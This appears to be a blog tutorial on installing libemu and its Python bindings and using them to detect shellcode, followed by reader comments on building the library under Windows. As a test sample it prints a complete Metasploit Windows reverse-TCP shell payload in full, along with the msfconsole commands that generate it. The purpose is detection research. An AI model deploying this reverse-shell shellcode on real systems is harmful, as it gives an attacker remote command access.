Shellcode detection using libemu

Shellcode can be seen as a list of instructions written so that it can be injected into an application at runtime. Every security researcher runs into shellcode sooner or later, and in this article I'll show how to detect it using Python (via the libemu Python binding).

A few words about libemu:
libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. Intended use is within network intrusion/prevention detections and honeypots.
The information on the project site is out of date in places, so I'll give direct and clear instructions on how to get and install libemu.

Clone the git repository:

$ git clone git://git.carnivore.it/libemu.git

First, configure, build and install libemu itself (without the bindings):

$ autoreconf -v -i
$ ./configure --prefix=/opt/libemu
$ make
$ sudo make install

If you set the prefix as shown above, you have to add the library path to the /etc/ld.so.conf file. It should look like this:

include /etc/ld.so.conf.d/*.conf
/opt/libemu/lib

After that, update the linker run-time database:

$ sudo ldconfig
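
To confirm that the run-time linker can now see the library, one option is to ask Python's `ctypes.util.find_library`. This is only a minimal sketch: it assumes the install step produced a shared object named `libemu.so` (so the short name is `emu`), and the helper name `library_visible` and its `finder` parameter are illustrative, not part of libemu.

```python
import ctypes.util


def library_visible(name="emu", finder=ctypes.util.find_library):
    """Return True if the linker can resolve lib<name>.

    `name` defaults to "emu" on the assumption that libemu was
    installed as libemu.so. `finder` is injectable so the check can
    be exercised on a machine where libemu is not installed.
    """
    return finder(name) is not None
```

Calling `library_visible()` after `ldconfig` should return True if the path was registered correctly; a False result suggests the /etc/ld.so.conf entry is missing or `ldconfig` was not re-run.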

Now it's time to build the Python bindings (the configure script is incomplete, so some configuration must be done by hand):

$ ./configure --prefix=/opt/libemu/ --enable-python-bindings
$ cp bindings/python/setup.py bindings/python/setup.py.orig
$ sed -e 's/${prefix}/\/opt\/libemu/' bindings/python/setup.py > bindings/python/setup.py.tmp
$ sed -e 's/${exec_prefix}/\/opt\/libemu/' bindings/python/setup.py.tmp > bindings/python/setup.py
$ rm -f bindings/python/setup.py.tmp
$ make
$ sudo make install

That's all - the Python binding is ready. Let's test a sample string:


$ python
Python 2.6.6 (r266:84292, Sep 15 2010, 16:22:56)
[GCC 4.4.5] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import libemu
>>> emulator = libemu.Emulator()
>>> emulator.test("hello world!")
>>>

As you can see, for an innocent string the emulator test (the emu_shellcode_test function in C) returns nothing.
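
The check above can be wrapped in a small predicate so that calling code does not have to interpret the raw return value. This is a sketch under stated assumptions: the function name `looks_like_shellcode` is made up for illustration, `None` is treated as "clean" because that is what the session above shows, and `-1` is also treated as "clean" because that is the sentinel the author mentions checking for in the comments below. Any other value is treated as a hit.

```python
def looks_like_shellcode(emulator, data):
    """Return True if emulator.test(data) reports a possible shellcode.

    Assumptions: `emulator` is any object exposing test(data), such as
    libemu.Emulator(); None and -1 both mean "nothing detected".
    """
    result = emulator.test(data)
    return result is not None and result != -1


# Usage with the real binding (requires libemu to be installed):
#   import libemu
#   print(looks_like_shellcode(libemu.Emulator(), "hello world!"))
```

Passing the emulator in as an argument keeps the helper independent of how the binding was built, and makes it easy to try out with a stand-in object.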

Now let's take some real shellcode from Metasploit. It's pretty easy: some payloads in MSF are provided as shellcode, so we only have to generate the source code:


msf > use windows/shell_reverse_tcp
msf payload(shell_reverse_tcp) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf payload(shell_reverse_tcp) > generate -t ruby
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# LHOST=0.0.0.0, LPORT=4444, ReverseConnectRetries=5, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
"\x00\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56" +
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"
Unfortunately, MSF can't generate source code in Python, so we'll wrap the Ruby expression in parentheses:


>>> shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
... "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
... "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
... "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
... "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
... "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
... "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
... "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
... "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
... "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
... "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
... "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
... "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
... "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
... "\x00\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56" +
... "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
... "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
... "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
... "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
... "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
... "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
... "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
... "\x6f\x6a\x00\x53\xff\xd5")
>>> emulator.test(shellcode)
-4657153
The result is the offset within the buffer where the shellcode is suspected. See the emu_shellcode_test reference.
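
Pasting the Ruby literal by hand, as done above, can also be automated. The following is a minimal sketch that pulls every `\xNN` escape out of the text printed by `generate -t ruby` and joins the values into one byte string. It assumes the payload is written entirely as `\xNN` escapes, as in the listing above; the function name `ruby_buf_to_bytes` is hypothetical.

```python
import re

# Matches one textual escape such as \xfc and captures the two hex digits.
_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def ruby_buf_to_bytes(text):
    r"""Collect every \xNN escape found in `text` into one byte string.

    Everything else (quotes, '+', 'buf =', comment lines) is ignored,
    so the generator output can be passed in unchanged.
    """
    values = [int(digits, 16) for digits in _HEX_ESCAPE.findall(text)]
    return bytes(bytearray(values))
```

The returned value can then be handed to `emulator.test(...)` in place of the pasted literal. On Python 2, as used in this article, the result is an ordinary `str`.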

So, as you can see, libemu is a useful library and should not be underestimated. Besides shellcode detection, it can be used for various kinds of emulation, and it is used extensively in security research projects. Don't miss your chance to use it too. Good luck!

Comments

  1. Hi, I tried in vain to have a Windows version of Libemu. :( Would you please help me?

  2. AFAIK, a Windows version of Libemu doesn't exist. However, there are some ways to get or use it:
    - compile it in Windows using cygwin or mingw;
    - compile it in Linux for Windows using cross-compilation libraries like mingw;
    - use coLinux or some VM to run Linux software in Windows;
    - rewrite some parts of the Libemu to support building by native Windows compilers.

    I assume it can help you to understand the directions you can move. If you need further assistance let me know.

  3. Hi there,
    We can use Malzilla and use the shellcode analyzer in there (they use libemu for shellcode detection and emulation).

  4. Are you sure? I've taken a brief look at its sources (Pascal, probably Delphi, oh, horror :) ) and have not found any references to libemu.

  5. @Alexander: I've used Cygwin to build libemu. I followed the compiling instructions found in the README file, but an error came up when I issued the configure command. Below is what Cygwin gave me. :((

    ./configure --prefix=/opt/libemu
    ....
    checking cargos-lib.h usability... no
    checking cargos-lib.h presence... no
    checking for cargos-lib.h... no
    configure: creating ./config.status
    .in'ig.status: error: cannot find input file: `Makefile


    --> Any idea?

  6. Has your autoreconf command been successful? I've just tested - I can configure libemu without any problems using Cygwin. Just don't forget to install the packages below and all their dependencies:
    - gcc;
    - make;
    - automake;
    - libtool;
    - gettext-devel.

    However, the make command fails with the default Cygwin GCC installation because it is outdated. You can try to update GCC: http://cygwin.wikia.com/wiki/How_to_install_GCC_4.3.0

  7. I've switched to use Mingw instead. Everything seemed to be going fine. But when I issued "make install", another error appeared:

    "emu.c:44:2: error: function declaration isn't a prototype
    emu.c:44:7: error: field '_errno' declared as a function
    emu.c: In function 'emu_errno_set':
    emu.c:100:5: error: expected identifier before '(' token
    emu.c: In function 'emu_errno':
    emu.c:105:12: error: expected identifier before '(' token
    emu.c: In function 'emu_strerror_set':
    emu.c:116:2: error: implicit declaration of function 'vasprintf'
    emu.c: In function 'emu_errno':
    emu.c:106:1: error: control reaches end of non-void function
    make[2]: *** [emu.lo] Error 1
    make[2]: Leaving directory `/libemu/src'
    make[1]: *** [install-recursive] Error 1
    make[1]: Leaving directory `/libemu/src'
    make: *** [install-recursive] Error 1"

    Consequently, I took a glance at emu.c to see what's wrong with it.

    struct emu
    {
    struct emu_logging *log;
    struct emu_memory *memory;
    struct emu_cpu *cpu;
    int errno; // line 44
    char *errorstr;
    };

    I couldn't find anything suspicious. So what's going on here?

  8. Would you please give me a pre-built version of libemu?

  9. I don't have any pre-built version of libemu for Windows. I frankly doubt that using Windows for security research is a good idea, and assume that libemu developers think the same.

    However, I'll take a look at the MinGW error a little bit later. There is nothing wrong with the emu struct; it looks like the problem is in the usage of standard headers (e.g., maybe errno.h is not included in emu.c).

  10. Well, apparently libemu uses GNU extensions, so you can't just compile it for Windows without any modifications. For example, the vasprintf function is not provided by MinGW (so neither direct compilation on Windows nor cross-compilation on Linux will work).

    So if you insist on a Windows version of libemu, you have to rewrite some parts of its code. It looks like the OpenDUNE developers are also doing this, so you can try their version: http://wiki.opendune.org/Development/Windows

  11. Thanks for your patience. It's very kind of you to give me such good advice. Somehow I managed to build libemu successfully using Cygwin. After compiling, in the output folder (c:\cygwin\opt\libemu\lib\), I saw the following files:

    libemu.a
    libemu.dll.a
    libemu.la
    emu.o

    How can I get a DLL file?

  12. Try searching for it in other directories. As you can see (libtool: What .la file is for?), the DLL file should be somewhere, and probably not in the "lib" dir.

  13. OMG, at last I've got it! :D Thank you very much!

  14. Nice post; however, there are enough reasons not to rely on libemu: http://2011.6.20.libemu-fnstenv-no-detection.blog.oxff.net/

  15. Thanks, we'll give libscizzle a try :) Libemu is indeed not perfect, but we use it only as an auxiliary tool; actual shellcode is detected and analysed by other tools.

  16. Is there actually such a thing as a negative offset?

  17. I've posted the actual result. Of course, it looks suspicious, so I would not trust the value itself, and would only use the condition "!= -1" as a criterion for potential malware.

  18. So when you come across a negative offset with Libemu, do you flag it as shellcode?

  19. Use Nemu instead of Libemu. Libemu has very limited heuristics to detect shellcode.

    Replies
    1. Probably, but a brief search shows that it's a closed prototype. If it's publicly available, please provide a link.
